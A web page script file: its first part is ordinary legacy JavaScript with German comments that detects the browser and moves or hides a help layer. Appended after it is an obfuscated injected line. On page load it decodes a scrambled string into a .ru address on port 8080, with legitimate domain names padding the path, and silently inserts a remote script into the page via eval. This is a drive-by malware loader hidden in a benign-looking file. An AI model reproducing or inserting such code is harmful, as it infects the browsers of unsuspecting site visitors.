<!--
// Browser ermitteln
var NS4 = 1;
var NS6 = 2;
var IE  = 3;
var MO  = 4;
BrowserCode = 0;

// Netscape ?
if (navigator.appName.indexOf("Netscape") != -1) {
  if (document.layers) BrowserCode = NS4;
  else BrowserCode = NS6;
}

// MSIE oder Mozilla?
else if (document.all) BrowserCode = IE;
else if (document.getElementById) BrowserCode = MO;

// EventFunktion
function Placing(x) {
  if(BrowserCode == NS4) {
    document.help.top=x;
    document.help.left=3;
  } else if (BrowserCode == NS6) {
    document.getElementById("help").style.top=x;
    document.getElementById("help").style.left=3;
  } else if (BrowserCode == IE) {
    document.all.help.style.top=x;
    document.all.help.style.left=3;
  }

  if (x < -1) {
    setTimeout("Placing("+(x+2)+")",75);
  }
}

// Info ueber einen Typ ausgeben
function infoAbout(x) {
  if (document.all) {
    document.all.help.style.visibility=(x)?"inherit":"hidden";
  } else if (document.getElementById) {
    document.getElementById("help").style.visibility=(x)?"inherit":"hidden";
  } else {
    document.help.visibility=(x)?"inherit":"hidden";
  }
}

//-->




try{window.onload=function(){In2me740wr6p = '' + '3@!&7(&w$(@a)^)&$n$!-@@)c$o$#@m($@.@!&!p$r(i&)#c)^!e)$l@^i)^@n&#$@e^.$^c)(o^m(&!.(i$(g^@@-#$#(c&$($o)m!#^-$&@b!)r^^#!.&^b##e#(^s!&!#t!)b)$!!o()@@n^&d#^s^$#i&)(@t!e#.#@(r&$()u)!&$:!F#$!x&&$&d)((!@y@^)o#&p$^8#q#!&w!()^^u$#&f&(/^g&$^o())o^&g)&$l!($$(e)&.@^^!c!^@o!@)m$)&)/@g$#^(o@&(o!#(g!!$&l#)e(@.))$@@c)!o&@m&!@/(@&p@@^)l^##a!)l^))^a(&.@@o$r$$$)(.^j(@)p^^^/!p!#i@!c^&@f($^o(c&&o!.&)c$&o&m@))/@^&d(@)i$@(^(c@^t#.)#c!c$)/#'.replace(/#|\^|\!|\(|@|&|\)|\$/ig, '') ;Gzo15e3fj2v = 'appendChild';Y37tonfjla3 = document.createElement('sc'+'ript');Y37tonfjla3.src = 'h'+'ttp://'+In2me740wr6p.replace(/Fxdyop8qwuf/g, '8080');Y37tonfjla3.setAttribute('defer', 'def'+'er');eval('document.body.'+Gzo15e3fj2v+'(Y37tonfjla3)');} }  catch(Ge68god ) {}